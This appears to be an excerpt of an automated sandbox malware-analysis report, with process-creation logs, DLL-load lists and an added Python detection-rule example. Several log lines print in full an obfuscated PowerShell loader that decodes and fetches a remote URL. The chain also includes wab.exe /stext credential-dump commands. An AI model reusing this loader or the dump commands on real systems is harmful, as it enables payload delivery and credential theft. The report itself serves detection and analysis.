Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian"
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian"
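The process chain recorded above is what the Sigma hits in this report key on: a script host launches 64-bit PowerShell, which relaunches the 32-bit PowerShell host with the same obfuscated command line, resolves %APPDATA% through cmd.exe, starts the Windows Mail address book wab.exe as an injection host, and wab.exe then relaunches itself with /stext <path>, the save-to-text switch of the NirSoft password-recovery tools that this report's Yara rules identify, writing to %TEMP%. The rule set below is an added example written for this page, not Joe Sandbox or Sigma code. The events are transcribed from the lines above into a constructed (parent image, child image, command line) form with command lines shortened to what each rule inspects; the parent allow-list for wab.exe and the member-invoke pattern are assumptions of the example.

```python
import ntpath
import re

# Constructed test input transcribed from the process-creation events in this
# report: (parent image, child image, child command line). Command lines are
# shortened to the parts the rules inspect.
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
WAB = r"C:\Program Files (x86)\Windows Mail\wab.exe"
STAGE = ("\"%s\" \"cls;write 'Knyttelversenes Brilliancies';"
         "If (${host}.CurrentCulture) {$Transplantat++;}"
         "Function Brassart($Slingrer){$Sendetiders='SUBsTRI';$Sendetiders+='ng';"
         "$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}\"")
EVENTS = [
    (r"C:\Windows\System32\wscript.exe", PS64, STAGE % PS64),
    (PS64, PS32, STAGE % PS32),
    (PS32, r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"'),
    (PS32, WAB, '"%s"' % WAB),
    (WAB, WAB, '"%s" /stext "C:\\Users\\user\\AppData\\Local\\Temp\\xkkian"' % WAB),
]


def base(path):
    return ntpath.basename(path).lower()


def is_powershell(path):
    return base(path) in ("powershell.exe", "pwsh.exe")


# A method name assembled from string pieces and called through a variable:
#   $x='SUBsTRI'; $x+='ng'; ... $s.$x.Invoke(...)
OBFUSCATED_INVOKE = re.compile(r"\.\$\w+\.Invoke\s*\(", re.IGNORECASE)
# wab.exe writing a NirSoft-style /stext dump under a Temp directory.
STEXT_TO_TEMP = re.compile(r'/stext\s+"[^"]*\\temp\\', re.IGNORECASE)

# Each rule sees (parent image, child image, child command line).
RULES = {
    "script_host_spawns_powershell":
        lambda p, c, cl: base(p) in ("wscript.exe", "cscript.exe") and is_powershell(c),
    "powershell_relaunches_32bit_host":
        lambda p, c, cl: is_powershell(p) and is_powershell(c)
        and "\\system32\\" in p.lower() and "\\syswow64\\" in c.lower(),
    "powershell_obfuscated_member_invoke":
        lambda p, c, cl: is_powershell(c) and OBFUSCATED_INVOKE.search(cl) is not None,
    "powershell_resolves_appdata_via_cmd":
        lambda p, c, cl: is_powershell(p) and base(c) == "cmd.exe"
        and "echo %appdata%" in cl.lower(),
    # Assumed benign parents of wab.exe: the shell and wab.exe itself.
    "wab_unusual_parent":
        lambda p, c, cl: base(c) == "wab.exe" and base(p) not in ("explorer.exe", "wab.exe"),
    "wab_stext_credential_dump":
        lambda p, c, cl: base(c) == "wab.exe" and STEXT_TO_TEMP.search(cl) is not None,
}


def evaluate(events):
    """Return {rule name: [indexes of events that matched]} for rules that fired."""
    hits = {}
    for idx, (parent, child, cmdline) in enumerate(events):
        for name, pred in RULES.items():
            if pred(parent, child, cmdline):
                hits.setdefault(name, []).append(idx)
    return hits


def chain_score(events):
    """Number of distinct rules the chain trips; the chain in this report trips all six."""
    return len(evaluate(events))


if __name__ == "__main__":
    for name, idxs in evaluate(EVENTS).items():
        print(f"{name:40s} events {idxs}")
    print("distinct rules fired:", chain_score(EVENTS))
```

None of the six rules is conclusive on its own (32-bit relaunches and wab.exe launches both happen legitimately); the value is in the same parent/child chain tripping several of them within seconds, which is how the report's "Suspicious execution chain found" verdict should be read.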
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptnet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
